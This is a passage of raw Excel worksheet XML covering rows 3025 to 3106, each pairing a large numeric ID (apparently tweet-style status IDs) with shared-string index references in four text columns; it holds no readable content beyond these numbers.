      <c r="A3025">
        <v>1.23494319768992E+18</v>
      </c>
      <c r="B3025" t="s">
        <v>7615</v>
      </c>
      <c r="C3025" t="s">
        <v>1</v>
      </c>
      <c r="D3025" t="s">
        <v>7616</v>
      </c>
      <c r="E3025" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="3026" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3026">
        <v>1.2349428353103601E+18</v>
      </c>
      <c r="B3026" t="s">
        <v>7617</v>
      </c>
      <c r="C3026" t="s">
        <v>1</v>
      </c>
      <c r="D3026" t="s">
        <v>7618</v>
      </c>
      <c r="E3026" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="3027" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3027">
        <v>1.23494216895295E+18</v>
      </c>
      <c r="B3027" t="s">
        <v>7619</v>
      </c>
      <c r="C3027" t="s">
        <v>1</v>
      </c>
      <c r="D3027" t="s">
        <v>7620</v>
      </c>
      <c r="E3027" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="3028" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3028">
        <v>1.2349420171149499E+18</v>
      </c>
      <c r="B3028" t="s">
        <v>7621</v>
      </c>
      <c r="C3028" t="s">
        <v>1</v>
      </c>
      <c r="D3028" t="s">
        <v>7622</v>
      </c>
      <c r="E3028" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="3029" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3029">
        <v>1.2349418447668101E+18</v>
      </c>
      <c r="B3029" t="s">
        <v>7623</v>
      </c>
      <c r="C3029" t="s">
        <v>1</v>
      </c>
      <c r="D3029" t="s">
        <v>7624</v>
      </c>
      <c r="E3029" t="s">
        <v>1916</v>
      </c>
    </row>
    <row r="3030" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3030">
        <v>1.23494161352624E+18</v>
      </c>
      <c r="B3030" t="s">
        <v>7625</v>
      </c>
      <c r="C3030" t="s">
        <v>1</v>
      </c>
      <c r="D3030" t="s">
        <v>7626</v>
      </c>
      <c r="E3030" t="s">
        <v>1253</v>
      </c>
    </row>
    <row r="3031" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3031">
        <v>1.2349414224591401E+18</v>
      </c>
      <c r="B3031" t="s">
        <v>7627</v>
      </c>
      <c r="C3031" t="s">
        <v>1</v>
      </c>
      <c r="D3031" t="s">
        <v>7628</v>
      </c>
      <c r="E3031" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="3032" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3032">
        <v>1.23494070100943E+18</v>
      </c>
      <c r="B3032" t="s">
        <v>7629</v>
      </c>
      <c r="C3032" t="s">
        <v>1</v>
      </c>
      <c r="D3032" t="s">
        <v>7630</v>
      </c>
      <c r="E3032" t="s">
        <v>7631</v>
      </c>
    </row>
    <row r="3033" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3033">
        <v>1.2349406125767501E+18</v>
      </c>
      <c r="B3033" t="s">
        <v>7632</v>
      </c>
      <c r="C3033" t="s">
        <v>1</v>
      </c>
      <c r="D3033" t="s">
        <v>7633</v>
      </c>
      <c r="E3033" t="s">
        <v>5485</v>
      </c>
    </row>
    <row r="3034" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3034">
        <v>1.2349403382609201E+18</v>
      </c>
      <c r="B3034" t="s">
        <v>7634</v>
      </c>
      <c r="C3034" t="s">
        <v>1</v>
      </c>
      <c r="D3034" t="s">
        <v>7635</v>
      </c>
      <c r="E3034" t="s">
        <v>7636</v>
      </c>
    </row>
    <row r="3035" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3035">
        <v>1.23494031338019E+18</v>
      </c>
      <c r="B3035" t="s">
        <v>7637</v>
      </c>
      <c r="C3035" t="s">
        <v>1</v>
      </c>
      <c r="D3035" t="s">
        <v>7638</v>
      </c>
      <c r="E3035" t="s">
        <v>4449</v>
      </c>
    </row>
    <row r="3036" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3036">
        <v>1.23493964736653E+18</v>
      </c>
      <c r="B3036" t="s">
        <v>7639</v>
      </c>
      <c r="C3036" t="s">
        <v>1</v>
      </c>
      <c r="D3036" t="s">
        <v>7640</v>
      </c>
      <c r="E3036" t="s">
        <v>5253</v>
      </c>
    </row>
    <row r="3037" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3037">
        <v>1.23493948334848E+18</v>
      </c>
      <c r="B3037" t="s">
        <v>7641</v>
      </c>
      <c r="C3037" t="s">
        <v>1</v>
      </c>
      <c r="D3037" t="s">
        <v>7642</v>
      </c>
      <c r="E3037" t="s">
        <v>7643</v>
      </c>
    </row>
    <row r="3038" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3038">
        <v>1.23493916869183E+18</v>
      </c>
      <c r="B3038" t="s">
        <v>7644</v>
      </c>
      <c r="C3038" t="s">
        <v>1</v>
      </c>
      <c r="D3038" t="s">
        <v>7645</v>
      </c>
      <c r="E3038" t="s">
        <v>7646</v>
      </c>
    </row>
    <row r="3039" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3039">
        <v>1.2349391008445701E+18</v>
      </c>
      <c r="B3039" t="s">
        <v>7647</v>
      </c>
      <c r="C3039" t="s">
        <v>1</v>
      </c>
      <c r="D3039" t="s">
        <v>7648</v>
      </c>
      <c r="E3039" t="s">
        <v>3877</v>
      </c>
    </row>
    <row r="3040" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3040">
        <v>1.2349386574438999E+18</v>
      </c>
      <c r="B3040" t="s">
        <v>7649</v>
      </c>
      <c r="C3040" t="s">
        <v>1</v>
      </c>
      <c r="D3040" t="s">
        <v>7650</v>
      </c>
      <c r="E3040" t="s">
        <v>7651</v>
      </c>
    </row>
    <row r="3041" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3041">
        <v>1.23493822940241E+18</v>
      </c>
      <c r="B3041" t="s">
        <v>7652</v>
      </c>
      <c r="C3041" t="s">
        <v>1</v>
      </c>
      <c r="D3041" t="s">
        <v>7653</v>
      </c>
      <c r="E3041" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="3042" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3042">
        <v>1.2349378589867899E+18</v>
      </c>
      <c r="B3042" t="s">
        <v>7654</v>
      </c>
      <c r="C3042" t="s">
        <v>1</v>
      </c>
      <c r="D3042" t="s">
        <v>7655</v>
      </c>
      <c r="E3042" t="s">
        <v>7656</v>
      </c>
    </row>
    <row r="3043" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3043">
        <v>1.2349377499433001E+18</v>
      </c>
      <c r="B3043" t="s">
        <v>7657</v>
      </c>
      <c r="C3043" t="s">
        <v>1</v>
      </c>
      <c r="D3043" t="s">
        <v>7658</v>
      </c>
      <c r="E3043" t="s">
        <v>1891</v>
      </c>
    </row>
    <row r="3044" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3044">
        <v>1.23493716803391E+18</v>
      </c>
      <c r="B3044" t="s">
        <v>7659</v>
      </c>
      <c r="C3044" t="s">
        <v>1</v>
      </c>
      <c r="D3044" t="s">
        <v>7660</v>
      </c>
      <c r="E3044" t="s">
        <v>1989</v>
      </c>
    </row>
    <row r="3045" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3045">
        <v>1.2349370445576801E+18</v>
      </c>
      <c r="B3045" t="s">
        <v>7661</v>
      </c>
      <c r="C3045" t="s">
        <v>1</v>
      </c>
      <c r="D3045" t="s">
        <v>7662</v>
      </c>
      <c r="E3045" t="s">
        <v>7663</v>
      </c>
    </row>
    <row r="3046" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3046">
        <v>1.23493593688829E+18</v>
      </c>
      <c r="B3046" t="s">
        <v>7664</v>
      </c>
      <c r="C3046" t="s">
        <v>1</v>
      </c>
      <c r="D3046" t="s">
        <v>7665</v>
      </c>
      <c r="E3046" t="s">
        <v>2035</v>
      </c>
    </row>
    <row r="3047" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3047">
        <v>1.23493463729999E+18</v>
      </c>
      <c r="B3047" t="s">
        <v>7666</v>
      </c>
      <c r="C3047" t="s">
        <v>1</v>
      </c>
      <c r="D3047" t="s">
        <v>7667</v>
      </c>
      <c r="E3047" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="3048" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3048">
        <v>1.23493449080128E+18</v>
      </c>
      <c r="B3048" t="s">
        <v>7668</v>
      </c>
      <c r="C3048" t="s">
        <v>1</v>
      </c>
      <c r="D3048" t="s">
        <v>7669</v>
      </c>
      <c r="E3048" t="s">
        <v>7670</v>
      </c>
    </row>
    <row r="3049" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3049">
        <v>1.2349344262258401E+18</v>
      </c>
      <c r="B3049" t="s">
        <v>7671</v>
      </c>
      <c r="C3049" t="s">
        <v>1</v>
      </c>
      <c r="D3049" t="s">
        <v>7672</v>
      </c>
      <c r="E3049" t="s">
        <v>7673</v>
      </c>
    </row>
    <row r="3050" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3050">
        <v>1.2349340713205901E+18</v>
      </c>
      <c r="B3050" t="s">
        <v>7674</v>
      </c>
      <c r="C3050" t="s">
        <v>1</v>
      </c>
      <c r="D3050" t="s">
        <v>7675</v>
      </c>
      <c r="E3050" t="s">
        <v>7676</v>
      </c>
    </row>
    <row r="3051" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3051">
        <v>1.2349329562229299E+18</v>
      </c>
      <c r="B3051" t="s">
        <v>7677</v>
      </c>
      <c r="C3051" t="s">
        <v>1</v>
      </c>
      <c r="D3051" t="s">
        <v>7678</v>
      </c>
      <c r="E3051" t="s">
        <v>7679</v>
      </c>
    </row>
    <row r="3052" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3052">
        <v>1.2349322819633101E+18</v>
      </c>
      <c r="B3052" t="s">
        <v>7680</v>
      </c>
      <c r="C3052" t="s">
        <v>1</v>
      </c>
      <c r="D3052" t="s">
        <v>7681</v>
      </c>
      <c r="E3052" t="s">
        <v>1174</v>
      </c>
    </row>
    <row r="3053" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3053">
        <v>1.2349321853643799E+18</v>
      </c>
      <c r="B3053" t="s">
        <v>7682</v>
      </c>
      <c r="C3053" t="s">
        <v>1</v>
      </c>
      <c r="D3053" t="s">
        <v>7683</v>
      </c>
      <c r="E3053" t="s">
        <v>7684</v>
      </c>
    </row>
    <row r="3054" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3054">
        <v>1.23493208699534E+18</v>
      </c>
      <c r="B3054" t="s">
        <v>7685</v>
      </c>
      <c r="C3054" t="s">
        <v>1</v>
      </c>
      <c r="D3054" t="s">
        <v>7686</v>
      </c>
      <c r="E3054" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="3055" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3055">
        <v>1.2349319062291699E+18</v>
      </c>
      <c r="B3055" t="s">
        <v>7687</v>
      </c>
      <c r="C3055" t="s">
        <v>1</v>
      </c>
      <c r="D3055" t="s">
        <v>7688</v>
      </c>
      <c r="E3055" t="s">
        <v>7684</v>
      </c>
    </row>
    <row r="3056" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3056">
        <v>1.2349317330338801E+18</v>
      </c>
      <c r="B3056" t="s">
        <v>7689</v>
      </c>
      <c r="C3056" t="s">
        <v>1</v>
      </c>
      <c r="D3056" t="s">
        <v>7690</v>
      </c>
      <c r="E3056" t="s">
        <v>975</v>
      </c>
    </row>
    <row r="3057" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3057">
        <v>1.2349316157149901E+18</v>
      </c>
      <c r="B3057" t="s">
        <v>7691</v>
      </c>
      <c r="C3057" t="s">
        <v>1</v>
      </c>
      <c r="D3057" t="s">
        <v>7692</v>
      </c>
      <c r="E3057" t="s">
        <v>1645</v>
      </c>
    </row>
    <row r="3058" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3058">
        <v>1.23493156309744E+18</v>
      </c>
      <c r="B3058" t="s">
        <v>7693</v>
      </c>
      <c r="C3058" t="s">
        <v>1</v>
      </c>
      <c r="D3058" t="s">
        <v>7694</v>
      </c>
      <c r="E3058" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="3059" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3059">
        <v>1.2349315624303501E+18</v>
      </c>
      <c r="B3059" t="s">
        <v>7693</v>
      </c>
      <c r="C3059" t="s">
        <v>1</v>
      </c>
      <c r="D3059" t="s">
        <v>7695</v>
      </c>
      <c r="E3059" t="s">
        <v>980</v>
      </c>
    </row>
    <row r="3060" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3060">
        <v>1.23493142700067E+18</v>
      </c>
      <c r="B3060" t="s">
        <v>7696</v>
      </c>
      <c r="C3060" t="s">
        <v>1</v>
      </c>
      <c r="D3060" t="s">
        <v>7697</v>
      </c>
      <c r="E3060" t="s">
        <v>7698</v>
      </c>
    </row>
    <row r="3061" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3061">
        <v>1.23493130414528E+18</v>
      </c>
      <c r="B3061" t="s">
        <v>7699</v>
      </c>
      <c r="C3061" t="s">
        <v>1</v>
      </c>
      <c r="D3061" t="s">
        <v>7700</v>
      </c>
      <c r="E3061" t="s">
        <v>7701</v>
      </c>
    </row>
    <row r="3062" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3062">
        <v>1.2349309199134799E+18</v>
      </c>
      <c r="B3062" t="s">
        <v>7702</v>
      </c>
      <c r="C3062" t="s">
        <v>1</v>
      </c>
      <c r="D3062" t="s">
        <v>814</v>
      </c>
      <c r="E3062" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="3063" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3063">
        <v>1.23493084114445E+18</v>
      </c>
      <c r="B3063" t="s">
        <v>7703</v>
      </c>
      <c r="C3063" t="s">
        <v>1</v>
      </c>
      <c r="D3063" t="s">
        <v>7704</v>
      </c>
      <c r="E3063" t="s">
        <v>7705</v>
      </c>
    </row>
    <row r="3064" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3064">
        <v>1.23493059105901E+18</v>
      </c>
      <c r="B3064" t="s">
        <v>7706</v>
      </c>
      <c r="C3064" t="s">
        <v>1</v>
      </c>
      <c r="D3064" t="s">
        <v>7707</v>
      </c>
      <c r="E3064" t="s">
        <v>7039</v>
      </c>
    </row>
    <row r="3065" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3065">
        <v>1.2349302952642199E+18</v>
      </c>
      <c r="B3065" t="s">
        <v>7708</v>
      </c>
      <c r="C3065" t="s">
        <v>1</v>
      </c>
      <c r="D3065" t="s">
        <v>7709</v>
      </c>
      <c r="E3065" t="s">
        <v>7710</v>
      </c>
    </row>
    <row r="3066" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3066">
        <v>1.23492910482429E+18</v>
      </c>
      <c r="B3066" t="s">
        <v>7711</v>
      </c>
      <c r="C3066" t="s">
        <v>1</v>
      </c>
      <c r="D3066" t="s">
        <v>7712</v>
      </c>
      <c r="E3066" t="s">
        <v>7713</v>
      </c>
    </row>
    <row r="3067" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3067">
        <v>1.23492850539105E+18</v>
      </c>
      <c r="B3067" t="s">
        <v>7714</v>
      </c>
      <c r="C3067" t="s">
        <v>1</v>
      </c>
      <c r="D3067" t="s">
        <v>7715</v>
      </c>
      <c r="E3067" t="s">
        <v>2192</v>
      </c>
    </row>
    <row r="3068" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3068">
        <v>1.2349283557970099E+18</v>
      </c>
      <c r="B3068" t="s">
        <v>7716</v>
      </c>
      <c r="C3068" t="s">
        <v>1</v>
      </c>
      <c r="D3068" t="s">
        <v>7717</v>
      </c>
      <c r="E3068" t="s">
        <v>7718</v>
      </c>
    </row>
    <row r="3069" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3069">
        <v>1.2349278288665999E+18</v>
      </c>
      <c r="B3069" t="s">
        <v>7719</v>
      </c>
      <c r="C3069" t="s">
        <v>1</v>
      </c>
      <c r="D3069" t="s">
        <v>7720</v>
      </c>
      <c r="E3069" t="s">
        <v>4672</v>
      </c>
    </row>
    <row r="3070" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3070">
        <v>1.23492700270623E+18</v>
      </c>
      <c r="B3070" t="s">
        <v>7721</v>
      </c>
      <c r="C3070" t="s">
        <v>1</v>
      </c>
      <c r="D3070" t="s">
        <v>7722</v>
      </c>
      <c r="E3070" t="s">
        <v>7723</v>
      </c>
    </row>
    <row r="3071" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3071">
        <v>1.2349269513383601E+18</v>
      </c>
      <c r="B3071" t="s">
        <v>7724</v>
      </c>
      <c r="C3071" t="s">
        <v>1</v>
      </c>
      <c r="D3071" t="s">
        <v>7725</v>
      </c>
      <c r="E3071" t="s">
        <v>7726</v>
      </c>
    </row>
    <row r="3072" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3072">
        <v>1.23492645334863E+18</v>
      </c>
      <c r="B3072" t="s">
        <v>7727</v>
      </c>
      <c r="C3072" t="s">
        <v>1</v>
      </c>
      <c r="D3072" t="s">
        <v>7728</v>
      </c>
      <c r="E3072" t="s">
        <v>7729</v>
      </c>
    </row>
    <row r="3073" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3073">
        <v>1.2349263790928799E+18</v>
      </c>
      <c r="B3073" t="s">
        <v>7730</v>
      </c>
      <c r="C3073" t="s">
        <v>1</v>
      </c>
      <c r="D3073" t="s">
        <v>7731</v>
      </c>
      <c r="E3073" t="s">
        <v>7732</v>
      </c>
    </row>
    <row r="3074" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3074">
        <v>1.2349263107466501E+18</v>
      </c>
      <c r="B3074" t="s">
        <v>7733</v>
      </c>
      <c r="C3074" t="s">
        <v>1</v>
      </c>
      <c r="D3074" t="s">
        <v>7734</v>
      </c>
      <c r="E3074" t="s">
        <v>4672</v>
      </c>
    </row>
    <row r="3075" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3075">
        <v>1.2349261919554601E+18</v>
      </c>
      <c r="B3075" t="s">
        <v>7735</v>
      </c>
      <c r="C3075" t="s">
        <v>1</v>
      </c>
      <c r="D3075" t="s">
        <v>7736</v>
      </c>
      <c r="E3075" t="s">
        <v>2826</v>
      </c>
    </row>
    <row r="3076" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3076">
        <v>1.2349260209580101E+18</v>
      </c>
      <c r="B3076" t="s">
        <v>7737</v>
      </c>
      <c r="C3076" t="s">
        <v>1</v>
      </c>
      <c r="D3076" t="s">
        <v>7738</v>
      </c>
      <c r="E3076" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="3077" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3077">
        <v>1.2349259612519401E+18</v>
      </c>
      <c r="B3077" t="s">
        <v>7739</v>
      </c>
      <c r="C3077" t="s">
        <v>1</v>
      </c>
      <c r="D3077" t="s">
        <v>7740</v>
      </c>
      <c r="E3077" t="s">
        <v>7741</v>
      </c>
    </row>
    <row r="3078" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3078">
        <v>1.2349252753869499E+18</v>
      </c>
      <c r="B3078" t="s">
        <v>7742</v>
      </c>
      <c r="C3078" t="s">
        <v>1</v>
      </c>
      <c r="D3078" t="s">
        <v>7743</v>
      </c>
      <c r="E3078" t="s">
        <v>7744</v>
      </c>
    </row>
    <row r="3079" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3079">
        <v>1.2349251504596401E+18</v>
      </c>
      <c r="B3079" t="s">
        <v>7745</v>
      </c>
      <c r="C3079" t="s">
        <v>1</v>
      </c>
      <c r="D3079" t="s">
        <v>7746</v>
      </c>
      <c r="E3079" t="s">
        <v>1939</v>
      </c>
    </row>
    <row r="3080" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3080">
        <v>1.23492502604399E+18</v>
      </c>
      <c r="B3080" t="s">
        <v>7747</v>
      </c>
      <c r="C3080" t="s">
        <v>1</v>
      </c>
      <c r="D3080" t="s">
        <v>7748</v>
      </c>
      <c r="E3080" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="3081" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3081">
        <v>1.23492419693058E+18</v>
      </c>
      <c r="B3081" t="s">
        <v>7749</v>
      </c>
      <c r="C3081" t="s">
        <v>1</v>
      </c>
      <c r="D3081" t="s">
        <v>7750</v>
      </c>
      <c r="E3081" t="s">
        <v>4820</v>
      </c>
    </row>
    <row r="3082" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3082">
        <v>1.2349240440358001E+18</v>
      </c>
      <c r="B3082" t="s">
        <v>7751</v>
      </c>
      <c r="C3082" t="s">
        <v>1</v>
      </c>
      <c r="D3082" t="s">
        <v>7752</v>
      </c>
      <c r="E3082" t="s">
        <v>7753</v>
      </c>
    </row>
    <row r="3083" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3083">
        <v>1.23492403389394E+18</v>
      </c>
      <c r="B3083" t="s">
        <v>7754</v>
      </c>
      <c r="C3083" t="s">
        <v>1</v>
      </c>
      <c r="D3083" t="s">
        <v>7755</v>
      </c>
      <c r="E3083" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="3084" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3084">
        <v>1.23492401564033E+18</v>
      </c>
      <c r="B3084" t="s">
        <v>7756</v>
      </c>
      <c r="C3084" t="s">
        <v>1</v>
      </c>
      <c r="D3084" t="s">
        <v>7757</v>
      </c>
      <c r="E3084" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="3085" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3085">
        <v>1.2349240080738299E+18</v>
      </c>
      <c r="B3085" t="s">
        <v>7758</v>
      </c>
      <c r="C3085" t="s">
        <v>1</v>
      </c>
      <c r="D3085" t="s">
        <v>7759</v>
      </c>
      <c r="E3085" t="s">
        <v>1729</v>
      </c>
    </row>
    <row r="3086" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3086">
        <v>1.2349235933241999E+18</v>
      </c>
      <c r="B3086" t="s">
        <v>7760</v>
      </c>
      <c r="C3086" t="s">
        <v>1</v>
      </c>
      <c r="D3086" t="s">
        <v>7761</v>
      </c>
      <c r="E3086" t="s">
        <v>7762</v>
      </c>
    </row>
    <row r="3087" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3087">
        <v>1.23492354886878E+18</v>
      </c>
      <c r="B3087" t="s">
        <v>7763</v>
      </c>
      <c r="C3087" t="s">
        <v>1</v>
      </c>
      <c r="D3087" t="s">
        <v>7764</v>
      </c>
      <c r="E3087" t="s">
        <v>7765</v>
      </c>
    </row>
    <row r="3088" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3088">
        <v>1.23492342749408E+18</v>
      </c>
      <c r="B3088" t="s">
        <v>7766</v>
      </c>
      <c r="C3088" t="s">
        <v>1</v>
      </c>
      <c r="D3088" t="s">
        <v>7767</v>
      </c>
      <c r="E3088" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="3089" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3089">
        <v>1.2349231652116401E+18</v>
      </c>
      <c r="B3089" t="s">
        <v>7768</v>
      </c>
      <c r="C3089" t="s">
        <v>1</v>
      </c>
      <c r="D3089" t="s">
        <v>7769</v>
      </c>
      <c r="E3089" t="s">
        <v>5668</v>
      </c>
    </row>
    <row r="3090" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3090">
        <v>1.2349230858134799E+18</v>
      </c>
      <c r="B3090" t="s">
        <v>7770</v>
      </c>
      <c r="C3090" t="s">
        <v>1</v>
      </c>
      <c r="D3090" t="s">
        <v>7771</v>
      </c>
      <c r="E3090" t="s">
        <v>7772</v>
      </c>
    </row>
    <row r="3091" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3091">
        <v>1.2349228565192901E+18</v>
      </c>
      <c r="B3091" t="s">
        <v>7773</v>
      </c>
      <c r="C3091" t="s">
        <v>1</v>
      </c>
      <c r="D3091" t="s">
        <v>7774</v>
      </c>
      <c r="E3091" t="s">
        <v>6040</v>
      </c>
    </row>
    <row r="3092" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3092">
        <v>1.23492278537123E+18</v>
      </c>
      <c r="B3092" t="s">
        <v>7775</v>
      </c>
      <c r="C3092" t="s">
        <v>1</v>
      </c>
      <c r="D3092" t="s">
        <v>7776</v>
      </c>
      <c r="E3092" t="s">
        <v>7777</v>
      </c>
    </row>
    <row r="3093" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3093">
        <v>1.2349225329874501E+18</v>
      </c>
      <c r="B3093" t="s">
        <v>7778</v>
      </c>
      <c r="C3093" t="s">
        <v>1</v>
      </c>
      <c r="D3093" t="s">
        <v>7779</v>
      </c>
      <c r="E3093" t="s">
        <v>7250</v>
      </c>
    </row>
    <row r="3094" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3094">
        <v>1.23492242455199E+18</v>
      </c>
      <c r="B3094" t="s">
        <v>7780</v>
      </c>
      <c r="C3094" t="s">
        <v>1</v>
      </c>
      <c r="D3094" t="s">
        <v>7781</v>
      </c>
      <c r="E3094" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="3095" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3095">
        <v>1.2349224055224699E+18</v>
      </c>
      <c r="B3095" t="s">
        <v>7782</v>
      </c>
      <c r="C3095" t="s">
        <v>1</v>
      </c>
      <c r="D3095" t="s">
        <v>7783</v>
      </c>
      <c r="E3095" t="s">
        <v>7784</v>
      </c>
    </row>
    <row r="3096" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3096">
        <v>1.2349223510007099E+18</v>
      </c>
      <c r="B3096" t="s">
        <v>7785</v>
      </c>
      <c r="C3096" t="s">
        <v>1</v>
      </c>
      <c r="D3096" t="s">
        <v>7786</v>
      </c>
      <c r="E3096" t="s">
        <v>5884</v>
      </c>
    </row>
    <row r="3097" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3097">
        <v>1.2349223410853399E+18</v>
      </c>
      <c r="B3097" t="s">
        <v>7787</v>
      </c>
      <c r="C3097" t="s">
        <v>1</v>
      </c>
      <c r="D3097" t="s">
        <v>7788</v>
      </c>
      <c r="E3097" t="s">
        <v>7789</v>
      </c>
    </row>
    <row r="3098" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3098">
        <v>1.2349223305241201E+18</v>
      </c>
      <c r="B3098" t="s">
        <v>7790</v>
      </c>
      <c r="C3098" t="s">
        <v>1</v>
      </c>
      <c r="D3098" t="s">
        <v>7791</v>
      </c>
      <c r="E3098" t="s">
        <v>7792</v>
      </c>
    </row>
    <row r="3099" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3099">
        <v>1.2349222625973701E+18</v>
      </c>
      <c r="B3099" t="s">
        <v>7793</v>
      </c>
      <c r="C3099" t="s">
        <v>1</v>
      </c>
      <c r="D3099" t="s">
        <v>7794</v>
      </c>
      <c r="E3099" t="s">
        <v>7795</v>
      </c>
    </row>
    <row r="3100" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3100">
        <v>1.23492221739536E+18</v>
      </c>
      <c r="B3100" t="s">
        <v>7796</v>
      </c>
      <c r="C3100" t="s">
        <v>1</v>
      </c>
      <c r="D3100" t="s">
        <v>7797</v>
      </c>
      <c r="E3100" t="s">
        <v>1975</v>
      </c>
    </row>
    <row r="3101" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3101">
        <v>1.2349221056758899E+18</v>
      </c>
      <c r="B3101" t="s">
        <v>7798</v>
      </c>
      <c r="C3101" t="s">
        <v>1</v>
      </c>
      <c r="D3101" t="s">
        <v>7799</v>
      </c>
      <c r="E3101" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="3102" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3102">
        <v>1.23492205193426E+18</v>
      </c>
      <c r="B3102" t="s">
        <v>7800</v>
      </c>
      <c r="C3102" t="s">
        <v>1</v>
      </c>
      <c r="D3102" t="s">
        <v>7801</v>
      </c>
      <c r="E3102" t="s">
        <v>7802</v>
      </c>
    </row>
    <row r="3103" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3103">
        <v>1.2349220423922601E+18</v>
      </c>
      <c r="B3103" t="s">
        <v>7803</v>
      </c>
      <c r="C3103" t="s">
        <v>1</v>
      </c>
      <c r="D3103" t="s">
        <v>7804</v>
      </c>
      <c r="E3103" t="s">
        <v>7805</v>
      </c>
    </row>
    <row r="3104" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3104">
        <v>1.23492199327697E+18</v>
      </c>
      <c r="B3104" t="s">
        <v>7806</v>
      </c>
      <c r="C3104" t="s">
        <v>1</v>
      </c>
      <c r="D3104" t="s">
        <v>7807</v>
      </c>
      <c r="E3104" t="s">
        <v>7808</v>
      </c>
    </row>
    <row r="3105" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3105">
        <v>1.2349217366442801E+18</v>
      </c>
      <c r="B3105" t="s">
        <v>7809</v>
      </c>
      <c r="C3105" t="s">
        <v>1</v>
      </c>
      <c r="D3105" t="s">
        <v>7810</v>
      </c>
      <c r="E3105" t="s">
        <v>2860</v>
      </c>
    </row>
    <row r="3106" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3106">
        <v>1.23492128971598E+18</v>
      </c>
      <c r="B3106" t="s">
        <v>7811</v>
